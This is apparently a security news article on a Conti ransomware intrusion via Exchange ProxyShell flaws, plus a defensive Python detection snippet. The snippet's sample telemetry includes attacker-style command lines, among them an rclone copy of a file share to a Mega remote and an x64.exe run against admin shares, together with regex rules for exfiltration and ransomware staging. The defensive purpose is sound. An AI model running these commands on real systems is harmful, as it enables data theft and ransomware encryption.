Researchers have uncovered a new, ongoing attack campaign by the Conti ransomware gang that uses the ProxyShell exploit to target organizations' networks.
ProxyShell is an exploit written to abuse the Microsoft Exchange vulnerabilities reported over the past months; Microsoft patched them and released an update in May 2021 as part of Patch Tuesday.
Conti is one of the most ruthless ransomware gangs; the FBI has reported that the gang was involved in more than 400 high-profile cyber attacks, with ransom demands as high as $25 million.
The new ProxyShell attack is being employed by ransomware groups: the same exploit was already used by the LockFile ransomware, and now it is being used by Conti.
Researchers from Sophos believe the attackers have gained experience with these techniques, shortening their dwell time before launching the final ransomware payload on target networks.
Conti gained access to the targeted network in under a minute and set up a remote web shell. They then installed a second web shell to act as a backup.
Thirty minutes later, the attackers generated a complete list of the computers deployed in the targeted network, its domain controllers, and its domain admins.
It took them about an hour to obtain the credentials of domain administrator accounts; in another 48 hours they exfiltrated about 1 terabyte of data, and finally they deployed the Conti ransomware to every machine on the network within 48 hours.
Technical Analysis
A chain of Microsoft Exchange vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) was fixed in the April and May Exchange Server cumulative updates, which required organizations to upgrade their Exchange servers.
But some organizations left their Exchange servers unpatched to avoid email downtime, leaving them exposed to attackers who routinely scan for vulnerable systems.
Once the attackers had successfully entered the network, they created a new mailbox for “administrator” and assigned it a new role with the help of Microsoft Exchange cmdlets, which let them execute shell commands remotely.
\\127.0.0.1\C$\inetpub\wwwroot\aspnet_client\aspnetclient_log.aspx
Later, the attackers created a web shell via the server's localhost address (the path above) and executed a PowerShell script encoded in base64.
In the next stage, the attackers used the encoded command to abuse the Service Control Manager to run a directory listing of the directory where the web shell was dropped.
In the reconnaissance phase, the attackers ran another PowerShell command to retrieve the list of domain computers from the text file and to collect information about the network configuration, domain administrators, users actively connected to the system, and the process ID of the Local Security Authority Subsystem Service (LSASS), Sophos said.
Once they had collected all the necessary data, the attackers dropped an executable file (SVN.exe) on the system and executed it, which established a connection to a C2 server located in Finland.
With the initial compromise complete, the attackers stole credentials and then began lateral movement using an existing domain administrator account whose password they had cracked.
“That account was used to create an RDP connection from the Exchange server to another server. One minute later, the logs of that server show the domain admin account downloading and installing the AnyDesk remote desktop software as a service.”
Finally, the attackers deployed the file-copying utility Rclone on multiple servers with the help of a PowerShell file.
The data was then transferred to the Mega file-sharing service, using a configuration that included the addresses of the remote drives and the username and password for that account.
Exactly five days after the initial compromise, the Conti actors began deploying the ransomware and encrypting files.
“Four batch scripts (called 1help.bat, 2help.bat, 3help.bat, and 4help.bat) were run from four servers. The batch files repeatedly invoked the ransomware executable (x64.exe), with each iteration targeting specific drives on every Windows system on the network by their default file sharing names.”
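The chain above leaves a handful of host-level traces a defender can hunt for: an .aspx file appearing under the Exchange aspnet_client directory, base64-encoded PowerShell, Rclone pointed at Mega, AnyDesk installed as a service, and the 1help.bat to 4help.bat runners feeding x64.exe the default administrative shares. As an added example (not from the article or from Sophos), this Python applies one regex rule per stage to constructed sample telemetry; the event schema, file paths, host names and the base64 string are assumptions, not observed values.

```python
import re

# Constructed sample host telemetry (not real logs): each record has a
# type (file_create / process_create / service_install) and string fields.
SAMPLE_EVENTS = [
    {"type": "file_create",
     "target": r"C:\inetpub\wwwroot\aspnet_client\aspnetclient_log.aspx"},
    {"type": "process_create",  # base64 below is a placeholder, not a real payload
     "cmdline": "powershell.exe -nop -w hidden -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQ=="},
    {"type": "process_create",
     "cmdline": r"C:\ProgramData\rclone.exe copy \\FS01\Finance mega:exfil --config C:\ProgramData\rclone.conf"},
    {"type": "service_install", "service": "AnyDesk Service",
     "image_path": r"C:\Program Files (x86)\AnyDesk\AnyDesk.exe --service"},
    {"type": "process_create", "cmdline": r"cmd.exe /c C:\temp\1help.bat"},
    {"type": "process_create", "cmdline": r"C:\temp\x64.exe \\WS01\C$ \\WS01\D$"},
    {"type": "process_create", "cmdline": "notepad.exe report.txt"},  # benign control
]

# (rule name, event type, field, pattern): one rule per stage the article describes.
RULES = [
    ("exchange_webshell_drop", "file_create", "target",
     re.compile(r"\\inetpub\\wwwroot\\aspnet_client\\[^\\]+\.aspx$", re.I)),
    ("encoded_powershell", "process_create", "cmdline",
     re.compile(r"powershell(\.exe)?\b.*\s-e[a-z]*\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("rclone_to_mega", "process_create", "cmdline",
     re.compile(r"rclone(\.exe)?\s+(copy|sync|move)\b.*\bmega:", re.I)),
    ("anydesk_service_install", "service_install", "image_path", re.compile(r"anydesk", re.I)),
    ("conti_batch_runner", "process_create", "cmdline", re.compile(r"\b[1-4]help\.bat\b", re.I)),
    ("ransomware_vs_admin_shares", "process_create", "cmdline",
     re.compile(r"x64\.exe\b.*\\\\[^\\\s]+\\[A-Za-z]\$", re.I)),
]

def detect(events):
    """Return (rule_name, event_index) for every event that matches a rule."""
    hits = []
    for idx, ev in enumerate(events):
        for name, ev_type, field, rx in RULES:
            if ev.get("type") == ev_type and rx.search(ev.get(field, "")):
                hits.append((name, idx))
    return hits

def stages_seen(events):
    """De-duplicated rule names in hit order: how much of the chain the data shows."""
    seen = []
    for name, _ in detect(events):
        if name not in seen:
            seen.append(name)
    return seen
```

Running detect(SAMPLE_EVENTS) flags the six staged events and leaves the benign notepad record alone; in practice the same rules would be fed from Sysmon or EDR process, file and service events.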
ProxyShell and other attacks on known Microsoft Exchange vulnerabilities are extremely frequent right now. Organizations are advised to update and patch their on-premises Exchange Servers as soon as possible.
Here are the recently released updates with the patches for the Microsoft Exchange server.